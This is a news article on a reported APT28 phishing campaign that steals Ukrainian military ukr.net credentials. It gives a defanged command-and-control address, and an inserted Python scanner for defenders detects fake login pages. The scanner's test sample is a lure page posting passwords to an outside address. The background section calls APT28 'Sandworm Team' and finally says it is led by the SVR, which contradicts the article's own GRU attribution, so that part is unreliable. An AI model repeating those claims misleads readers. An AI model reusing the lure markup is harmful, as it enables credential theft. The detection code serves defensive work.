Russian APT28 phishing Ukraine's military to steal login info


Ukraine’s National Cyber Security Coordination Center (NCSCC) is warning its military members of a new phishing campaign led by the Russian-backed cybercriminal group APT28.

“Amidst the lack of success on the battlefield, Russia is stepping up its cyber-espionage efforts and continuing to try to gain access to Ukraine's military situational awareness and command and control systems by stealing military personnel's credentials,” the NCSCC said in an official statement on the attacks.

The NCSCC put the warning out on various social media platforms over the weekend, and it was picked up and further distributed by the all-volunteer IT Army of Ukraine on Monday.

APT28 is specifically targeting military personnel and units of the Ukrainian Defense Forces using phishing emails in an attempt to gain access to military email accounts, the NCSCC said.

“APT28 targets Ukrainian military with phishing!” the IT Army Telegram post said.

“They create sites that look almost identical to ukr[.]net but have slight differences in the URL to trap you into entering your data!” it said.

IT Army Ukraine APT28 espionage campaign

The government defense agency said it first became aware of the campaign on January 19th, after discovering several emails containing fake HTML pages on the “ukr[.]net mail service.”

In one instance, the hackers crafted an HTML page “imitating military operational information regarding the Russian invasion,” which sent the user to a fake login page.

“When the page is opened, a field for entering ukr[.]net credentials is displayed to allegedly "confirm access," from where the credentials will be sent to a server controlled by the group,” the agency posted on X.

In another instance, the hackers try to trick the user by sending an email claiming the account was compromised and providing a link to reset the account password.

“When clicking on the "Change password" button on the HTML page, a browser-in-browser attack is launched and a special iframe with a fake page for entering ukr[.]net credentials is embedded,” the NCSCC said.

In both cases, the credentials are exfiltrated to a command and control server, where the group attempts to escalate privileges and move around the system.
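A defender-side check for the HTML lures described above, added here as an example and not part of the NCSCC advisory or the IT Army post: it scans a mailed HTML attachment for a password form or an embedded iframe whose target host is not ukr.net. The allow-list, the sample HTML and the 203.0.113.10 address are constructed for the example.

```python
"""Flag HTML email attachments that stage a fake ukr.net login (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

LEGIT_HOSTS = {"ukr.net", "mail.ukr.net"}  # assumed allow-list for the real mail service


class _LoginScanner(HTMLParser):
    """Collect password inputs (with their form action) and iframe sources."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._form_action = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form_action = a.get("action", "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.findings.append(("password_field", self._form_action or ""))
        elif tag == "iframe":  # browser-in-browser lures embed the fake page here
            self.findings.append(("iframe", a.get("src", "")))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_action = None


def _host(url):
    return (urlparse(url).hostname or "").lower()


def scan_html_attachment(html):
    """Return (kind, url, host) for every credential sink not on ukr.net."""
    scanner = _LoginScanner()
    scanner.feed(html)
    # A relative or empty action posts back to the attachment's own origin,
    # which for a mailed HTML file is never the real mail service: flag it too.
    return [(kind, url, _host(url)) for kind, url in scanner.findings
            if _host(url) not in LEGIT_HOSTS]


# Constructed sample mimicking the "confirm access" lure with an operator C2 address.
SAMPLE = """<html><body><h1>Operational update</h1><p>Confirm access to continue</p>
<form action="http://203.0.113.10:35770/post">
<input name="login"><input type="password" name="pass"></form>
<iframe src="http://ukr-net-login.example/auth"></iframe></body></html>"""

if __name__ == "__main__":
    for finding in scan_html_attachment(SAMPLE):
        print(finding)
```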

The NCSCC reported that “the actor-controlled server (hxxp://202.55.80[.]225:35770) is an Ubiquiti Edge router."

APT28 is known for using "pre-compromised Ubiquiti Edge routers to exfiltrate data in previous phishing campaigns," the agency said.

Who is APT28?

APT28 – also referred to as Fancy Bear or Sandworm Team – is not to be confused with APT29, a separate Russian advanced persistent threat group first observed in 2008.

APT28 was formed in 2004 and has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165, according to the MITRE ATT&CK framework.

In 2016, the group was thought to have carried out attacks on the US Democratic National Committee and the Democratic Congressional Campaign Committee, including the Hillary Clinton campaign, in an attempt to interfere with the US presidential election, MITRE reported.

Five members of GRU unit 26165 were charged by US federal prosecutors in 2018 for infiltrating the US and World Anti-Doping Agencies, among other high-value targets, the report said.

APT29 – aka Cozy Bear or Nobelium – is the gang responsible for the recently discovered attacks on Microsoft and Hewlett Packard Enterprise, and for the infamous 2020 SolarWinds breach of the US government.

Still backed by the Kremlin, APT28 is said to be led by Russia’s Foreign Intelligence Service (SVR).